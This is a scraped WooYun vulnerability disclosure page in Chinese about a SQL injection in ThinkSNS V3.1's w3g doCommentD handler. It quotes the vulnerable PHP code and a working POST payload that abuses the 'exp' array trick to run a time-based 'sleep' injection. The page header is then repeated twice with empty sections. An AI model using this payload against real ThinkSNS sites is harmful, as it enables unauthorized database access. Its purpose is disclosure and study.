ThinkSNS 防御绕过sql注射 | wooyun-2015-094609| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094609

漏洞标题：ThinkSNS 防御绕过sql注射

漏洞作者： menmen519

提交时间：2015-02-04 17:54

修复时间：2015-04-02 10:23

公开时间：2015-04-02 10:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-04：细节已通知厂商并且等待厂商处理中
2015-02-09：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-04-05：细节向核心白帽子及相关领域专家公开
2015-04-15：细节向普通白帽子公开
2015-04-25：细节向实习白帽子公开
2015-04-02：细节向公众公开

简要描述：

ThinkSNS 防御绕过注射

详细说明：

public function doCommentD(){
		if ( ($feed_id = intval($_POST['rowid'])) <= 0 ) {
			// $this->redirect(U('w3g/Index/index'), 3, '参数错误');
			echo '参数错误';
			exit;
		}
		if ( empty($_POST['content']) ) {
			// $this->redirect(U('w3g/Index/detail',array('feed_id'=>$feed_id)), 3, '内容不能为空');
			// return ;
			echo '内容不能为空';
			exit();
		}
		//原微博的内容
		$map['comment_id'] = $_POST['comment_id'];
		$preComment = M('Comment')->where($map)->find();

这里不多作赘述:
发送url:
http://localhost/ThinkSNS_V3.1_20131108_28822/index.php?app=w3g&mod=Index&act=doCommentD
postdata:
rowid=1&content=xxxxxx&comment_id[0]=exp&comment_id[1]=%3d1)) or sleep/**/(5)#

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-04-02 10:23

厂商回复：

漏洞评价：

2015-02-04 18:02 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

又见大神
2015-02-04 19:12 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

又见大神
2015-02-04 20:03 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

66666
2015-02-04 21:59 | 黑天鹅 ( 路人 | Rank:4 漏洞数:1 | 关注黑天鹅现象)

猛男准备请客吃饭吧
2015-02-04 22:53 | ca1n ( 普通白帽子 | Rank:100 漏洞数:22 | not yet)

围观门神
2015-02-05 00:28 | zxx ( 实习白帽子 | Rank:57 漏洞数:23 | com)

6666666
2015-02-05 08:28 | Dusk ( 路人 | Rank:1 漏洞数:1 | 小白大牛别打我。。！)

围观门神
2015-02-05 09:20 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

@黑天鹅必须请客啊，不请客都说不过去了
2015-02-05 09:43 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

@黑天鹅 @pandas 过年没钱花了对于这些熬夜的人你们太残忍了
2015-02-05 15:44 | 君宝 ( 路人 | Rank:19 漏洞数:4 | 不要跟我比浪。。你浪不过我。。)

马克

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094609

漏洞标题：ThinkSNS 防御绕过sql注射

相关厂商：ThinkSNS

漏洞作者： menmen519

提交时间：2015-02-04 17:54

修复时间：2015-04-02 10:23

公开时间：2015-04-02 10:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094609

漏洞标题：ThinkSNS 防御绕过sql注射

相关厂商：ThinkSNS

漏洞作者： menmen519

提交时间：2015-02-04 17:54

修复时间：2015-04-02 10:23

公开时间：2015-04-02 10:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-094609"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：